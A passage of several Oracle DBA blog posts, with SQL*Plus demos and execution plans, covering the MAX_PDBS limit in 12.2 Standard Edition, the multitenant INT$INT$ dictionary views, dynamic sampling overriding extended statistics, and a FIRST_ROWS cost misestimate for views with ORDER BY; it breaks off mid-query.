
Max PDBs in Standard Edition


Here is a small warning. In Standard Edition, you may expect that features which are not available for your edition are blocked, but in 12.2 you can create more than one PDB in Standard Edition, and you should set MAX_PDBS to prevent that.
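A quick way to check the current limit before doing anything (just a sketch; the value you see depends on your patch level):

-- Current limit on the number of user PDBs (12.2 parameter, also used later in this post)
show parameter max_pdbs
-- or, from any client:
select name, value, isdefault from v$parameter where name = 'max_pdbs';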

12cR1

In 12.1 Standard Edition, when you try to create more than one PDB (i.e. with CON_ID > 3) you get an error:

ORA-65010: maximum number of pluggable databases created

12cR2

But it seems that this has been lost in 12.2:


oracle@SE122 ~$ sqlplus / as sysdba
 
SQL*Plus: Release 12.2.0.1.0 Production on Thu Oct 10 11:41:56 2017
 
Copyright (c) 1982, 2016, Oracle. All rights reserved.
 
 
Connected to:
Oracle Database 12c Standard Edition Release 12.2.0.1.0 - 64bit Production
 
SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
---------- ------------------------------ ---------- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
 
SQL> create pluggable database PDB2 admin user admin identified by me;
 
Pluggable database created.
 
SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
---------- ------------------------------ ---------- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 MOUNTED
SQL> alter pluggable database PDB2 open;
 
Pluggable database altered.

So, if you are in Standard Edition, don’t forget to set MAX_PDBS to 1:

SQL> alter pluggable database PDB2 close immediate;
 
Pluggable database altered.
 
SQL> drop pluggable database PDB2 including datafiles;
 
Pluggable database dropped.
 
SQL> alter system set max_pdbs=1;
 
System altered.
 
SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
---------- ------------------------------ ---------- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
 
12:18:28 SQL> create pluggable database PDB2 admin user pdbadmin identified by oracle;
create pluggable database PDB2 admin user pdbadmin identified by oracle
*
ERROR at line 1:
ORA-65010: maximum number of pluggable databases created

 



Multitenant internals: INT$ and INT$INT$ views


This month, I’ll talk – with a lot of demos – about multitenant internals at the DOAG conference.
The multitenant dictionary architecture starts with a simple idea: system metadata and data are in CDB$ROOT and user metadata and data are in PDB. And it could have been that simple. When a session connected to a PDB needs to read some system information, the session context is switched to the CDB$ROOT container and reads from CDB$ROOT SYS tablespace and objects, and then switches back to the PDB container. This is implemented by metadata and data links: the PDB lists the objects for which the session has to switch to CDB$ROOT to get metadata or data.

But, for compatibility reasons and ease of administration, the dictionary views must display information from both containers, transparently, and then things become a little more complex with common views and extended data views.

At Oracle Open World, the multitenant architects, in the #PDBExpert session, answered questions about the multitenant architecture posted on Twitter. My first question (because I was investigating a bug at that time) was about some views, such as INT$INT$DBA_CONSTRAINTS, introduced to implement the complexity of showing the same information in the dictionary views as what we had in non-CDB databases. Of course, the architects didn’t want to go too far on this and had a very accurate answer: INT$ is for internal, and here you have two ‘INT$’ so you shouldn’t look at that.

But I like to understand how things work and here is the explanation of these INT$INT$ views. And I’m not even sure that INT is for ‘internal’ but maybe ‘intermediate’. But for sure, the $ at the end is used by Oracle internal dictionary objects.

INT$ Extended Data views

We are used to seeing all objects, system ones and user ones, listed by the dictionary views. For example, DBA_PROCEDURES shows all procedures, system and user ones, and then has to read from both containers (current PDB and CDB$ROOT) through extended data links. ALL_PROCEDURES shows all procedures accessible by the user, and it also has to switch to CDB$ROOT if the user has been granted access to system objects. USER_PROCEDURES shows only the objects owned by the current user, and can then read from the current container only.

For ease of definition, in 12c all the joins on the underlying tables (such as procedureinfo$, user$, obj$) are done by an intermediate view such as INT$DBA_PROCEDURES, which is defined as an EXTENDED DATA link to read from CDB$ROOT in addition to the local tables. Then DBA_PROCEDURES, ALL_PROCEDURES and USER_PROCEDURES are defined on top of it with the required where clause to filter on owner and privilege accessibility.
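A quick way to see this layering for yourself is to query DBA_DEPENDENCIES (a sketch; the exact list of referenced objects can vary with the release):

-- Which views does each *_PROCEDURES dictionary view depend on?
select name, referenced_name
from dba_dependencies
where owner='SYS' and type='VIEW'
and name in ('DBA_PROCEDURES','ALL_PROCEDURES','USER_PROCEDURES')
order by name, referenced_name;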

INT$INT$ Extended Data views

In this post, I’ll detail the special case of DBA_CONSTRAINTS because things are more complex to get the multitenant architecture behaving the same as the non-CDB.

There are several types of constraints, which are identified by the CONSTRAINT_TYPE column of DBA_CONSTRAINTS, or the TYPE# of the underlying table CDEF$.

Here, I query the underlying table with the CONTAINER() function to see what is stored in each container:

SQL> select decode(type#,1,'C',2,'P',3,'U',4,'R',5,'V',6,'O',7,'C',8,'H',9,'F',10,'F',11,'F',13,'F','?') constraint_type,
2 type#,con_id,count(*) from containers(cdef$)
3 group by type#,con_id order by type#,con_id;
 
CONSTRAINT_TYPE TYPE# CON_ID COUNT(*)
--------------- ----- ------ --------
C 1 1 74
C 1 3 74
P 2 1 843
P 2 3 844
U 3 1 238
U 3 3 238
R 4 1 324
R 4 3 324
V 5 1 11
O 6 1 172
O 6 3 26
C 7 1 5337
C 7 3 5337
F 11 1 11
F 11 3 11
? 12 1 3
? 12 3 3

I have very few user objects in this database. CON_ID=1 is CDB$ROOT and CON_ID=3 is my PDB. What we can see here is that we have nearly the same number of rows in both containers for the following constraint types: C (check constraint on a table), P (primary key), U (unique key), R (referential integrity), and other types related to tables. And some types have most of their rows in CDB$ROOT only: V (check option on views) and O (read only on views).

That’s an implementation specificity of the multitenant architecture which makes things more complex for the dictionary views. For some objects (such as procedures and views) the metadata is stored in only one container: system objects have all their information in CDB$ROOT and the PDB has only a link, which is a dummy row in OBJ$ that mentions the sharing (such as metadata link), the owner and name (to match the object in CDB$ROOT), and a signature (to verify that the DDL creating the object is the same). But other objects (such as tables) have their information duplicated in all containers for system objects (CDB$ROOT, PDB$SEED and all user PDBs). This is the reason why we see rows in both containers for constraint definitions when they are related to a table.
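To get an idea of how many dictionary objects use each mechanism, you can group on the SHARING column of DBA_OBJECTS (a sketch; the counts, and the possible sharing values, differ between releases):

-- Count SYS objects per sharing mode (e.g. METADATA LINK, EXTENDED DATA LINK, NONE)
select sharing, count(*)
from dba_objects
where owner='SYS'
group by sharing
order by count(*) desc;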

Example on view constraint

I’ll take a constraint on a system view as an example: constraint SYS_C003357 on SYS.DBA_XS_SESSIONS.


SQL> select owner,object_name,object_type,sharing from dba_objects where owner='SYS' and object_name='DBA_XS_SESSIONS';
 
OWNER OBJECT_NAME OBJECT_TYPE SHARING
----- ----------- ----------- -------
SYS DBA_XS_SESSIONS VIEW METADATA LINK
 
SQL> select owner,table_name,constraint_type,constraint_name from containers(dba_constraints) where owner='SYS' and table_name='DBA_XS_SESSIONS' and rownum=1;
 
OWNER TABLE_NAME CONSTRAINT_TYPE CONSTRAINT_NAME
----- ---------- --------------- ---------------
SYS DBA_XS_SESSIONS O SYS_C003357

I’m looking at the dependencies for the DBA_CONSTRAINTS view:

SQL> select owner,name,referenced_owner,referenced_name from dba_dependencies where owner='SYS' and name='DBA_CONSTRAINTS' and type='VIEW';
 
OWNER NAME REFERENCED_OWNER REFERENCED_NAME
----- ---- ---------------- ---------------
SYS DBA_CONSTRAINTS SYS GETLONG
SYS DBA_CONSTRAINTS SYS INT$DBA_CONSTRAINTS

So DBA_CONSTRAINTS is a view on INT$DBA_CONSTRAINTS, as we have seen above. However, this view is not directly reading the tables but another view:

SQL> select owner,name,referenced_owner,referenced_name from dba_dependencies where owner='SYS' and name='INT$DBA_CONSTRAINTS' and type='VIEW';
 
OWNER NAME REFERENCED_OWNER REFERENCED_NAME
----- ---- ---------------- ---------------
SYS INT$DBA_CONSTRAINTS SYS GETLONG
SYS INT$DBA_CONSTRAINTS SYS INT$INT$DBA_CONSTRAINTS

Here is our additional INT$INT$ view which is reading the tables:

SQL> select owner,name,referenced_owner,referenced_name from dba_dependencies where owner='SYS' and name='INT$INT$DBA_CONSTRAINTS' and type='VIEW';
 
OWNER NAME REFERENCED_OWNER REFERENCED_NAME
----- ---- ---------------- ---------------
SYS INT$INT$DBA_CONSTRAINTS SYS USER$
SYS INT$INT$DBA_CONSTRAINTS SYS CDEF$
SYS INT$INT$DBA_CONSTRAINTS SYS OBJ$
SYS INT$INT$DBA_CONSTRAINTS SYS CON$
SYS INT$INT$DBA_CONSTRAINTS SYS _CURRENT_EDITION_OBJ
SYS INT$INT$DBA_CONSTRAINTS SYS _BASE_USER
SYS INT$INT$DBA_CONSTRAINTS SYS GETLONG

In summary, the EXTENDED DATA view which reads the tables in each container (CDB$ROOT and PDB) is here INT$INT$DBA_CONSTRAINTS, and INT$DBA_CONSTRAINTS is another intermediate one below the DBA_CONSTRAINTS view.


SQL> select owner,object_name,object_type,sharing from dba_objects where object_name in ('DBA_CONSTRAINTS','INT$DBA_CONSTRAINTS','INT$INT$DBA_CONSTRAINTS') order by object_id desc;
 
OWNER OBJECT_NAME OBJECT_TYPE SHARING
----- ----------- ----------- -------
PUBLIC DBA_CONSTRAINTS SYNONYM METADATA LINK
SYS DBA_CONSTRAINTS VIEW METADATA LINK
SYS INT$DBA_CONSTRAINTS VIEW METADATA LINK
SYS INT$INT$DBA_CONSTRAINTS VIEW EXTENDED DATA LINK

In this example, we don’t see the reason for the additional intermediate view because they all return the same number of rows in each container:


SQL> select con_id,constraint_type,constraint_name from containers(INT$INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 O SYS_C003357
3 O SYS_C003357
 
SQL> select con_id,constraint_type,constraint_name from containers(INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 O SYS_C003357
3 O SYS_C003357
 
SQL> select con_id,constraint_type,constraint_name from containers(DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 O SYS_C003357
3 O SYS_C003357

The difference is only a few additional columns from the object definition (OWNERID,OBJECT_ID,OBJECT_TYPE#,SHARING) in the INT$ and INT$INT$ which are not selected in the final view:

SQL> select * from containers(INT$INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
OWNER OWNERID CONSTRAINT_NAME CONSTRAINT_TYPE TABLE_NAME OBJECT_ID OBJECT_TYPE# SEARCH_CONDITION_VC R_OWNER R_CONSTRAINT_NAME DELETE_RULE STATUS DEFERRABLE DEFERRED VALIDATED GENERATED BAD RELY LAST_CHANGE INDEX_OWNER INDEX_NAME INVALID VIEW_RELATED SHARING ORIGIN_CON_ID CON_ID
----- ------- --------------- --------------- ---------- --------- ------------ ------------------- ------- ----------------- ----------- ------ ---------- -------- --------- --------- --- ---- ----------- ----------- ---------- ------- ------------ ------- ------------- ------
SYS 0 SYS_C003357 O DBA_XS_SESSIONS 10316 4 ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1 1
SYS 0 SYS_C003357 O DBA_XS_SESSIONS 10316 4 ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1 3
 
SQL> select * from containers(INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
OWNER OWNERID CONSTRAINT_NAME CONSTRAINT_TYPE TABLE_NAME OBJECT_ID OBJECT_TYPE# SEARCH_CONDITION_VC R_OWNER R_CONSTRAINT_NAME DELETE_RULE STATUS DEFERRABLE DEFERRED VALIDATED GENERATED BAD RELY LAST_CHANGE INDEX_OWNER INDEX_NAME INVALID VIEW_RELATED SHARING ORIGIN_CON_ID CON_ID
----- ------- --------------- --------------- ---------- --------- ------------ ------------------- ------- ----------------- ----------- ------ ---------- -------- --------- --------- --- ---- ----------- ----------- ---------- ------- ------------ ------- ------------- ------
SYS 0 SYS_C003357 O DBA_XS_SESSIONS 10316 4 ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1 1
SYS 0 SYS_C003357 O DBA_XS_SESSIONS 10316 4 ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1 3
 
SQL> select * from containers(DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003357'
 
OWNER CONSTRAINT_NAME CONSTRAINT_TYPE TABLE_NAME SEARCH_CONDITION_VC R_OWNER R_CONSTRAINT_NAME DELETE_RULE STATUS DEFERRABLE DEFERRED VALIDATED GENERATED BAD RELY LAST_CHANGE INDEX_OWNER INDEX_NAME INVALID VIEW_RELATED ORIGIN_CON_ID CON_ID
----- --------------- --------------- ---------- ------------------- ------- ----------------- ----------- ------ ---------- -------- --------- --------- --- ---- ----------- ----------- ---------- ------- ------------ ------------- ------
SYS SYS_C003357 O DBA_XS_SESSIONS ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17 1 1
SYS SYS_C003357 O DBA_XS_SESSIONS ENABLED NOT DEFERRABLE IMMEDIATE NOT VALIDATED GENERATED NAME 26-JAN-17

If we look at the INT$DBA_CONSTRAINTS definition, we see some filters on those object attributes:

SQL> ddl INT$DBA_CONSTRAINTS
 
CREATE OR REPLACE FORCE NONEDITIONABLE VIEW "SYS"."INT$DBA_CONSTRAINTS" ("OWNER", "OWNERID", "CONSTRAINT_NAME", "CONSTRAINT_TYPE", "TABLE_NAME", "OBJECT_ID", "OBJECT_TYPE#", "SEARCH_CONDITION", "SEARCH_CONDITION_VC", "R_OWNER", "R_CONSTRAINT_NAME", "DELETE_RULE", "STATUS", "DEFERRABLE", "DEFERRED", "VALIDATED", "GENERATED", "BAD", "RELY", "LAST_CHANGE", "INDEX_OWNER", "INDEX_NAME", "INVALID", "VIEW_RELATED", "SHARING", "ORIGIN_CON_ID") AS
select OWNER, OWNERID, CONSTRAINT_NAME, CONSTRAINT_TYPE,
TABLE_NAME, OBJECT_ID, OBJECT_TYPE#, SEARCH_CONDITION,
SEARCH_CONDITION_VC, R_OWNER, R_CONSTRAINT_NAME, DELETE_RULE, STATUS,
DEFERRABLE, DEFERRED, VALIDATED, GENERATED,
BAD, RELY, LAST_CHANGE, INDEX_OWNER, INDEX_NAME,
INVALID, VIEW_RELATED, SHARING, ORIGIN_CON_ID
from INT$INT$DBA_CONSTRAINTS INT$INT$DBA_CONSTRAINTS
where INT$INT$DBA_CONSTRAINTS.OBJECT_TYPE# = 4 /* views */
OR (INT$INT$DBA_CONSTRAINTS.OBJECT_TYPE# = 2 /* tables */
AND (INT$INT$DBA_CONSTRAINTS.ORIGIN_CON_ID
= TO_NUMBER(SYS_CONTEXT('USERENV', 'CON_ID'))));

For views (OBJECT_TYPE#=4) there is no filter, which explains why we see the same number of rows in the previous example. But for tables (OBJECT_TYPE#=2) there’s an additional filter to keep the row from the current container only.

Example on table constraint

Then, I’ll take another example with a constraint definition for a table:

SQL> select owner,object_name,object_type,sharing from dba_objects where owner='SYS' and object_name='RXS$SESSIONS';
 
OWNER OBJECT_NAME OBJECT_TYPE SHARING
----- ----------- ----------- -------
SYS RXS$SESSIONS TABLE METADATA LINK
 
SQL> select owner,table_name,constraint_type,constraint_name from dba_constraints where owner='SYS' and table_name='RXS$SESSIONS' and rownum=1;
 
OWNER TABLE_NAME CONSTRAINT_TYPE CONSTRAINT_NAME
----- ---------- --------------- ---------------
SYS RXS$SESSIONS C SYS_C003339

From the INT$INT$ view, we get a duplicate when we query from a PDB because, for tables, the PDB does not only hold a dummy row in OBJ$: the full information about the table is duplicated in other tables such as TAB$ and CDEF$:

SQL> select con_id,constraint_type,constraint_name from containers(INT$INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003339'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 C SYS_C003339
3 C SYS_C003339
3 C SYS_C003339

This is the reason for the additional intermediate view: filtering out those duplicates by removing the rows from CDB$ROOT when queried from a PDB.

SQL> select con_id,constraint_type,constraint_name from containers(INT$DBA_CONSTRAINTS) where OWNER='SYS' and constraint_name='SYS_C003339'
 
CON_ID CONSTRAINT_TYPE CONSTRAINT_NAME
------ --------------- ---------------
1 C SYS_C003339
3 C SYS_C003339

Thanks to that, the duplicates are not visible in the end-user views DBA_CONSTRAINTS and CDB_CONSTRAINTS.

You may wonder why only DBA_CONSTRAINTS needs these views and not DBA_TABLES, DBA_INDEXES or DBA_TAB_COLUMNS. That’s because all information about system tables and indexes is replicated in all PDBs, so there is no need for EXTENDED DATA and context switches. DBA_CONSTRAINTS has the particularity of showing information about both tables and views, which implement the metadata links in different ways.
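If you want to see which other dictionary views received this additional layer, a simple sketch is to list the INT$INT$ objects (the list depends on the release and patch level):

-- List all dictionary views that have an INT$INT$ intermediate layer
select object_name, sharing
from dba_objects
where owner='SYS' and object_type='VIEW' and object_name like 'INT$INT$%'
order by object_name;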

 


Dynamic Sampling vs. Extended Statistics


On datawarehouse databases, I frequently recommend increasing the level of dynamic sampling because:

  • Queries have complex predicates with AND, OR, IN(), ranges and correlated values for which the optimizer cannot estimate the cardinality properly
  • Queries are long anyway (compared to OLTP) and can afford more parse time to get an optimized execution plan

However, there’s a drawback with this approach: sometimes the dynamic sampling estimation is wrong and supersedes static statistics that were better. Here is an example in 12.2.0.1.

I run with the following parameters:

SQL> show parameter adaptive;
NAME TYPE VALUE
--------------------------------- ------- -----
optimizer_adaptive_plans boolean TRUE
optimizer_adaptive_reporting_only boolean FALSE
optimizer_adaptive_statistics boolean FALSE
optimizer_dynamic_sampling integer 4

The Dynamic Sampling level comes from the previous version (11g), and Adaptive Statistics have been disabled because of all the problems seen in 12cR1 with Adaptive Dynamic Sampling bugs.

I have a query with very bad response time for some values, going to nested loops for 50000 rows. The reason is an under-estimate in the following part of the query:

SQL> explain plan for
2 SELECT count(*) FROM "APP_OWNR"."TBL_APPLICATION1_ID" "TBL_APPLICATION1_ID" WHERE upper("TBL_APPLICATION1_ID"."OPRID") =upper ('qwertz');
Explained.
SQL> select * from table(dbms_xplan.display);
PLAN_TABLE_OUTPUT
Plan hash value: 2187255533
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 7 | 964 (1)| 00:00:01 |
| 1 | SORT AGGREGATE | | 1 | 7 | | |
|* 2 | TABLE ACCESS FULL| TBL_APPLICATION1_ID | 82 | 574 | 964 (1)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
2 - filter(UPPER("OPRID")='QWERTZ')
 
Note
-----
- dynamic statistics used: dynamic sampling (level=4)

The estimation is 82 rows but there are actually 50000 rows. We can see that dynamic sampling was used. The misestimate is probably caused by a sample that is too small.

Ok, a query with an UPPER() function on the column is not a good idea. Let’s try to gather statistics for the expression:

SQL> exec dbms_stats.gather_table_stats('APP_OWNR','TBL_APPLICATION1_ID',method_opt=>'for all columns size auto for columns (upper(OPRID)) size auto');
PL/SQL procedure successfully completed.
 
SQL> explain plan for
2 SELECT count(*) FROM "APP_OWNR"."TBL_APPLICATION1_ID" "TBL_APPLICATION1_ID" WHERE upper("TBL_APPLICATION1_ID"."OPRID") =upper ('qwertz');
Explained.
SQL> select * from table(dbms_xplan.display);
PLAN_TABLE_OUTPUT
Plan hash value: 2187255533
 
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 7 | 964 (1)| 00:00:01 |
| 1 | SORT AGGREGATE | | 1 | 7 | | |
|* 2 | TABLE ACCESS FULL| TBL_APPLICATION1_ID | 82 | 574 | 964 (1)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
2 - filter(UPPER("OPRID")='QWERTZ')
PLAN_TABLE_OUTPUT
 
Note
-----
- dynamic statistics used: dynamic sampling (level=4)

We have the same misestimate. But the problem is not our statistics on the expression: this query is still doing dynamic sampling.

Here’s the proof that we have good static statistics:

SQL> alter session set optimizer_dynamic_sampling=2;
Session altered.
 
SQL> explain plan for
2 SELECT count(*) FROM "APP_OWNR"."TBL_APPLICATION1_ID" "TBL_APPLICATION1_ID" WHERE upper("TBL_APPLICATION1_ID"."OPRID") =upper ('qwertz');
Explained.
SQL> select * from table(dbms_xplan.display);
PLAN_TABLE_OUTPUT
Plan hash value: 2187255533
 
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 7 | 964 (1)| 00:00:01 |
| 1 | SORT AGGREGATE | | 1 | 7 | | |
|* 2 | TABLE ACCESS FULL| TBL_APPLICATION1_ID | 48594 | 332K| 964 (1)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
2 - filter(UPPER("OPRID")='QWERTZ')

Dynamic Sampling did not occur at level 2. Now the estimation is correct thanks to the extended statistics: I have a top-frequency histogram where the cardinality of the popular values is exact.
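To check that the extended statistics and their histogram are in place, you can join DBA_STAT_EXTENSIONS with DBA_TAB_COL_STATISTICS (a sketch, re-using the owner and table name from above):

-- Show the hidden column created for the UPPER(OPRID) expression and its histogram
select e.extension_name, e.extension, c.histogram, c.num_distinct
from dba_stat_extensions e
join dba_tab_col_statistics c
  on c.owner=e.owner and c.table_name=e.table_name and c.column_name=e.extension_name
where e.owner='APP_OWNR' and e.table_name='TBL_APPLICATION1_ID';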

The problem is that dynamic sampling is supposed to add more information for the optimizer, but in this case it replaces static statistics that were better. At level 4, dynamic sampling is done as soon as there is a complex predicate in the where clause, and the use of the UPPER() function is considered a complex predicate. However, in this case, because I have extended statistics, it should be considered a simple column=value predicate.

Here I’ve set dynamic sampling manually, but this is also what happens when SQL Plan Directives trigger the use of Dynamic Sampling and the good histogram is ignored. This reminds me of a Ludovico Caldara blog post about SPD.

Here, maybe, the solution would be Adaptive Dynamic Sampling which may increase the level of sampling when needed:

SQL> alter session set optimizer_dynamic_sampling=11;
Session altered.
 
SQL> explain plan for
2 SELECT count(*) FROM "APP_OWNR"."TBL_APPLICATION1_ID" "TBL_APPLICATION1_ID" WHERE upper("TBL_APPLICATION1_ID"."OPRID") =upper ('qwertz');
Explained.
SQL> select * from table(dbms_xplan.display);
PLAN_TABLE_OUTPUT
Plan hash value: 2187255533
 
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 7 | 964 (1)| 00:00:01 |
| 1 | SORT AGGREGATE | | 1 | 7 | | |
|* 2 | TABLE ACCESS FULL| TBL_APPLICATION1_ID | 37831 | 258K| 964 (1)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
2 - filter(UPPER("OPRID")='QWERTZ')
 
Note
-----
- dynamic statistics used: dynamic sampling (level=AUTO)

In this case, Adaptive Dynamic Sampling gives a good approximation. But it would be better to have a level of dynamic sampling that does not consider a predicate as a complex one when extended statistics exactly match the predicate. Until there is enough artificial intelligence to cope with this, the best recommendation is to focus on design. In this case, ensuring that we store only uppercase values is the best way to keep queries and estimations simple.
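As a sketch of that design recommendation (the constraint name is arbitrary), a simple check constraint guarantees that only uppercase values are stored, so the UPPER() function, and the extended statistics that go with it, are no longer needed:

-- Ensure OPRID is always stored in uppercase, so a plain equality predicate is enough
alter table APP_OWNR.TBL_APPLICATION1_ID
  add constraint TBL_APPLICATION1_OPRID_UPPER check (OPRID = upper(OPRID));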

 


CBO, FIRST_ROWS and VIEW misestimate


There are several bugs with the optimizer in FIRST_ROWS mode. Here is one I encountered during a 10.2.0.4 to 12.2.0.1 migration when a view had an ‘order by’ in its definition.

Here is the test case that reproduces the problem.

A big table:

SQL> create table DEMO1 (n constraint DEMO1_N primary key,x,y) as select 1/rownum,'x','y' from xmltable('1 to 1000000');
Table DEMO1 created.

with a view on it, and that view has an order by:

SQL> create view DEMOV as select * from DEMO1 order by n desc;
View DEMOV created.

and another table to join to:

SQL> create table DEMO2 (x constraint DEMO2_X primary key) as select dummy from dual;
Table DEMO2 created.

My query reads the view in a subquery, adds a call to a PL/SQL function, and joins the result with the other table:


SQL> explain plan for
select /*+ first_rows(10) */ *
from
( select v.*,dbms_random.value from DEMOV v)
where x in (select x from DEMO2)
order by n desc;
 
Explained.

You can see that I run it with FIRST_ROWS(10) because I actually want to fetch the top-10 rows when ordered by N. As N is a number, I have an index on it and there are no nulls (it is the primary key), I expect to read the first 10 entries from the index, call the function for each of them, then nested loop to the other table.

In the situation where I encountered it, this is what was done in 10g, but when migrated to 12c the query took very long because it called the PL/SQL function for millions of rows. Here is the plan in my example:


SQL> select * from dbms_xplan.display(format=>'+projection');
 
PLAN_TABLE_OUTPUT
-----------------
Plan hash value: 2046425878
 
--------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes |TempSpc| Cost (%CPU)| Time |
--------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 21 | | 7 (0)| 00:00:01 |
| 1 | NESTED LOOPS SEMI | | 1 | 21 | | 7 (0)| 00:00:01 |
| 2 | VIEW | DEMOV | 902 | 17138 | | 7 (0)| 00:00:01 |
| 3 | SORT ORDER BY | | 968K| 17M| 29M| 6863 (1)| 00:00:01 |
| 4 | TABLE ACCESS FULL | DEMO1 | 968K| 17M| | 1170 (1)| 00:00:01 |
| 5 | VIEW PUSHED PREDICATE | VW_NSO_1 | 1 | 2 | | 0 (0)| 00:00:01 |
|* 6 | INDEX UNIQUE SCAN | DEMO2_X | 1 | 2 | | 0 (0)| 00:00:01 |
--------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
6 - access("X"="V"."X")
 
Column Projection Information (identified by operation id):
-----------------------------------------------------------
 
1 - (#keys=0) "V"."N"[NUMBER,22], "V"."X"[CHARACTER,1], "V"."Y"[CHARACTER,1]
2 - "V"."N"[NUMBER,22], "V"."X"[CHARACTER,1], "V"."Y"[CHARACTER,1]
3 - (#keys=1) INTERNAL_FUNCTION("N")[22], "X"[CHARACTER,1], "Y"[CHARACTER,1]
4 - "N"[NUMBER,22], "X"[CHARACTER,1], "Y"[CHARACTER,1]

A full table scan of the big table, with a call to the PL/SQL function for each row and the sort operation on all rows. Then the Top-10 rows are filtered and the nested loop operates on that. But you see the problem here. The cost of the ‘full table scan’ and the ‘order by’ has been evaluated correctly, but the cost after the VIEW operation is minimized.

My interpretation (but it is just a quick guess) is that the rowset is marked as ‘sorted’ and then the optimizer considers that the cost to get the first rows is minimal (as if it were coming from an index). However, this just ignores the initial cost of getting this rowset.

I can force with a hint the plan that I want – index full scan to avoid a sort and get the top-10 rows quickly:

SQL> explain plan for
select /*+ first_rows(10) INDEX_DESC(@"SEL$3" "DEMO1"@"SEL$3" ("DEMO1"."N")) */ *
from
( select v.*,dbms_random.value from DEMOV v)
where x in (select x from DEMO2)
order by n desc;
 
Explained.

This plan is estimated with a higher cost than the previous one and this is why it was not chosen:

SQL> select * from dbms_xplan.display(format=>'+projection');
PLAN_TABLE_OUTPUT
Plan hash value: 2921908728
 
------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | 21 | 9 (0)| 00:00:01 |
| 1 | NESTED LOOPS SEMI | | 1 | 21 | 9 (0)| 00:00:01 |
| 2 | VIEW | DEMOV | 902 | 17138 | 9 (0)| 00:00:01 |
| 3 | TABLE ACCESS BY INDEX ROWID| DEMO1 | 968K| 17M| 8779 (1)| 00:00:01 |
| 4 | INDEX FULL SCAN DESCENDING| DEMO1_N | 968K| | 4481 (1)| 00:00:01 |
| 5 | VIEW PUSHED PREDICATE | VW_NSO_1 | 1 | 2 | 0 (0)| 00:00:01 |
|* 6 | INDEX UNIQUE SCAN | DEMO2_X | 1 | 2 | 0 (0)| 00:00:01 |
------------------------------------------------------------------------------------------
 
Predicate Information (identified by operation id):
---------------------------------------------------
 
6 - access("X"="V"."X")
 
Column Projection Information (identified by operation id):
-----------------------------------------------------------
 
1 - (#keys=0) "V"."N"[NUMBER,22], "V"."X"[CHARACTER,1], "V"."Y"[CHARACTER,1]
2 - "V"."N"[NUMBER,22], "V"."X"[CHARACTER,1], "V"."Y"[CHARACTER,1]
3 - "N"[NUMBER,22], "X"[CHARACTER,1], "Y"[CHARACTER,1]
4 - "DEMO1".ROWID[ROWID,10], "N"[NUMBER,22]

This cost estimation is fine. The cost of getting all rows by index access is higher than with a full table scan, but the optimizer knows that the actual cost is proportional to the number of rows fetched, and it adjusts the cost accordingly. This is fine here because the VIEW has only non-blocking operations. The problem in the first plan, without the hint, was that the same arithmetic was done without realizing that the SORT ORDER BY is a blocking operation, not a permanent sorted structure, and must be completed before being able to return the first row.

In this example, as in the real case I encountered, the difference in cost is very small (7 versus 9 here), which means that the plan can be ok one day and switch to the bad one (full scan, call the function for all rows, sort them) after a small change in statistics. Note that the plan was ok in 10g, but that may simply be related to the PGA settings and a different estimation of the cost of sorting.
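When in doubt, an easy way to compare the two plans at run time is to execute them with row-source statistics and look at actual rows and elapsed time per operation (a sketch; I add FETCH FIRST 10 ROWS ONLY to approximate a client that stops fetching after ten rows, which can itself influence the plan):

-- Run with row-source statistics, then compare E-Rows/A-Rows and A-Time
select /*+ gather_plan_statistics first_rows(10) */ *
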